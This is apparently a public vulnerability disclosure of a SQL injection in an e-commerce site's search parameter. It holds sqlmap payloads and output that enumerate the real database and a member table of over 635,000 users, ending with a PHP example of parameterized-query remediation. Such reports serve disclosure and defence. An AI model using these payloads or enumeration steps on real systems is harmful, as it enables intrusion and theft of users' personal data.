2016-02-19: Details reported to the vendor, awaiting vendor handling. 2016-02-24: The vendor has actively ignored the vulnerability; details are disclosed to the public.
。。。
http://**.**.**.**/index.php?app=search&vip=1&act=seller&classid=435&type=img  -  the classid parameter is injectable.
sqlmap identified the following injection point(s) with a total of 591 HTTP(s) requests:
---
Parameter: classid (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: app=search&vip=1&act=seller&classid=435 RLIKE (SELECT (CASE WHEN (4931=4931) THEN 435 ELSE 0x28 END))&type=img
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: app=search&vip=1&act=seller&classid=435 AND (SELECT 9228 FROM(SELECT COUNT(*),CONCAT(0x716a706b71,(SELECT (ELT(9228=9228,1))),0x716a717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&type=img
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: app=search&vip=1&act=seller&classid=435 AND (SELECT * FROM (SELECT(SLEEP(5)))JkXe)&type=img
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5.0
current user: 'o2oxx@localhost'
current database: 'aajflm'
current user is DBA: False
available databases [2]:
[*] aajflm
[*] information_schema

sqlmap resumed the following injection point(s) from stored session:
---
[injection point listing for classid (GET) identical to the run above]
---
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: aajflm
[107 tables]
+--------------------------+
| ecm_acategory            |
| ecm_address              |
| ecm_article              |
| ecm_attribute            |
| ecm_bankcard             |
| ecm_bankcard_record      |
| ecm_brand                |
| ecm_bvlog                |
| ecm_cart                 |
| ecm_category_goods       |
| ecm_category_store       |
| ecm_cflog                |
| ecm_collect              |
| ecm_comment              |
| ecm_consumption_code     |
| ecm_coupon               |
| ecm_coupon_sn            |
| ecm_exchange             |
| ecm_financial            |
| ecm_financial_records    |
| ecm_financial_records_ls |
| ecm_friend               |
| ecm_function             |
| ecm_gcategory            |
| ecm_goods                |
| ecm_goods_adv            |
| ecm_goods_attr           |
| ecm_goods_cart           |
| ecm_goods_image          |
| ecm_goods_order          |
| ecm_goods_qa             |
| ecm_goods_spec           |
| ecm_goods_spec_images    |
| ecm_goods_statistics     |
| ecm_groupbuy             |
| ecm_groupbuy_log         |
| ecm_incomebrand          |
| ecm_incomelog            |
| ecm_incomeshop           |
| ecm_jflog                |
| ecm_jfrestrictlog        |
| ecm_jy_income            |
| ecm_ka_cart              |
| ecm_ka_order             |
| ecm_ka_order_goods       |
| ecm_lottery              |
| ecm_mail_queue           |
| ecm_mcc                  |
| ecm_member               |
| ecm_member_account       |
| ecm_member_examrank      |
| ecm_message              |
| ecm_module               |
| ecm_myarea               |
| ecm_mycity               |
| ecm_myprovince           |
| ecm_navigation           |
| ecm_order                |
| ecm_order_extm           |
| ecm_order_goods          |
| ecm_order_log            |
| ecm_pageview             |
| ecm_partner              |
| ecm_payment              |
| ecm_pos_records          |
| ecm_pos_shop             |
| ecm_poslog               |
| ecm_posmember            |
| ecm_poss                 |
| ecm_postal               |
| ecm_privilege            |
| ecm_pro_bvrecord         |
| ecm_proposal             |
| ecm_recommend            |
| ecm_recommended_goods    |
| ecm_region               |
| ecm_sales                |
| ecm_scategory            |
| ecm_scope                |
| ecm_sessions             |
| ecm_sessions_data        |
| ecm_sgrade               |
| ecm_shipping             |
| ecm_shop                 |
| ecm_shop_10yuan          |
| ecm_shop_change_log      |
| ecm_shop_goods           |
| ecm_shop_ka              |
| ecm_shop_member          |
| ecm_shoptype             |
| ecm_shopujf              |
| ecm_spreader_member      |
| ecm_store                |
| ecm_tmpuser              |
| ecm_ukinds               |
| ecm_uploaded_file        |
| ecm_user_cf              |
| ecm_user_change_log      |
| ecm_user_coupon          |
| ecm_user_priv            |
| ecm_user_project         |
| ecm_wealthbean           |
| ecm_withdrawals          |
| ecm_yqf_data             |
| ecm_zsjflog              |
| sj_level                 |
| sj_member                |
+--------------------------+

sqlmap resumed the following injection point(s) from stored session:
---
[injection point listing for classid (GET) identical to the run above]
---
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: aajflm
+------------+---------+
| Table      | Entries |
+------------+---------+
| ecm_member | 635469  |
+------------+---------+

sqlmap resumed the following injection point(s) from stored session:
---
[injection point listing for classid (GET) identical to the run above]
---
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: aajflm
Table: ecm_member
[43 columns]
+-----------------+---------------------+
| Column          | Type                |
+-----------------+---------------------+
| level           | int(11)             |
| activation      | varchar(60)         |
| agreeprot       | tinyint(1)          |
| birthday        | date                |
| cncode          | varchar(25)         |
| dcncode         | varchar(25)         |
| dlevel          | int(11)             |
| double_count    | decimal(10,2)       |
| double_overtime | varchar(30)         |
| double_status   | int(10)             |
| email           | varchar(60)         |
| examrankid      | int(11)             |
| feed_config     | text                |
| fgtimes         | int(11)             |
| gender          | tinyint(3) unsigned |
| im_aliww        | varchar(60)         |
| im_msn          | varchar(60)         |
| im_qq           | varchar(60)         |
| im_skype        | varchar(60)         |
| im_yahoo        | varchar(60)         |
| isblack         | tinyint(4)          |
| isshop          | int(11)             |
| last_ip         | varchar(15)         |
| last_login      | int(10) unsigned    |
| lgtimes         | int(11)             |
| logins          | int(10) unsigned    |
| ngtimes         | int(11)             |
| openshop        | int(11)             |
| outer_id        | int(10) unsigned    |
| password        | varchar(32)         |
| phone_mob       | varchar(60)         |
| phone_tel       | varchar(60)         |
| portrait        | varchar(255)        |
| qxsh            | tinyint(1)          |
| real_name       | varchar(60)         |
| reg_time        | int(10) unsigned    |
| shopid          | int(11)             |
| shopnum         | int(11)             |
| tmpshopnum      | int(11)             |
| tpassword       | varchar(32)         |
| ugrade          | tinyint(3) unsigned |
| user_id         | int(10) unsigned    |
| user_name       | varchar(60)         |
+-----------------+---------------------+
Filter the parameter and use parameterized queries.
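To make the suggested fix concrete, the following is an added example (not code from the report, the mirror site, or the affected vendor) showing the lookup pattern that produces this bug next to a hardened version. It runs offline with the php CLI by using PDO over an in-memory SQLite database; the ecm_shop table name appears in the sqlmap listing above, but its columns (shop_id, classid, shop_name), the function names and the sample rows are assumptions made for the example.

```php
<?php
// Added example, not part of the WooYun report. Schema and data are constructed:
// only the table name ecm_shop is known from the sqlmap output, the columns
// shop_id/classid/shop_name are assumed. Runs with: php example.php
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE ecm_shop (shop_id INTEGER, classid INTEGER, shop_name TEXT)');
$pdo->exec("INSERT INTO ecm_shop VALUES (1, 435, 'shop-in-class-435')");
$pdo->exec("INSERT INTO ecm_shop VALUES (2, 436, 'shop-in-class-436')");

// Vulnerable pattern: the raw GET value is concatenated into the SQL text,
// so whatever follows the number is executed as SQL. This is what lets the
// boolean-, error- and time-based payloads in the sqlmap output reach MySQL.
function sellers_by_class_vulnerable(PDO $pdo, $classid) {
    $sql = "SELECT shop_id, shop_name FROM ecm_shop WHERE classid = " . $classid;
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern, both halves of the suggested fix:
//  1. parameter filtering: classid is only ever a short non-negative integer,
//     anything else is rejected before a query is built (\z, not $, so a
//     trailing newline cannot slip past the check);
//  2. parameterized query: the value is bound to a placeholder, so the
//     database receives it as data and never as part of the statement.
function sellers_by_class_hardened(PDO $pdo, $classid) {
    if (!preg_match('/^\d{1,10}\z/', (string)$classid)) {
        throw new InvalidArgumentException('classid must be a non-negative integer');
    }
    $stmt = $pdo->prepare('SELECT shop_id, shop_name FROM ecm_shop WHERE classid = :classid');
    $stmt->bindValue(':classid', (int)$classid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: the legitimate value from the report's URL, and a
// boolean tautology of the same shape as a blind-injection probe (the
// report's RLIKE/CASE form is MySQL-specific, so a portable one is used here).
$benign   = '435';
$tampered = '435 OR 1=1';

printf("vulnerable, benign:   %d row(s)\n", count(sellers_by_class_vulnerable($pdo, $benign)));
printf("vulnerable, tampered: %d row(s)\n", count(sellers_by_class_vulnerable($pdo, $tampered)));
printf("hardened,   benign:   %d row(s)\n", count(sellers_by_class_hardened($pdo, $benign)));
try {
    sellers_by_class_hardened($pdo, $tampered);
    echo "hardened,   tampered: executed (unexpected)\n";
} catch (InvalidArgumentException $e) {
    echo "hardened,   tampered: rejected (" . $e->getMessage() . ")\n";
}
```

The vulnerable function returns one row for the benign value and every row for the tampered one, because the condition has become `classid = 435 OR 1=1`; the hardened function returns one row for the benign value and rejects the tampered one before any SQL is built. The integer check alone would stop this particular input, but the prepared statement is what keeps the query safe for every parameter type, including string columns where a whitelist regex is not an option.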
Severity level: no impact (vendor ignored)
Ignored at: 2016-02-24 16:30
Vulnerability Rank: 15 (WooYun rating)
None yet.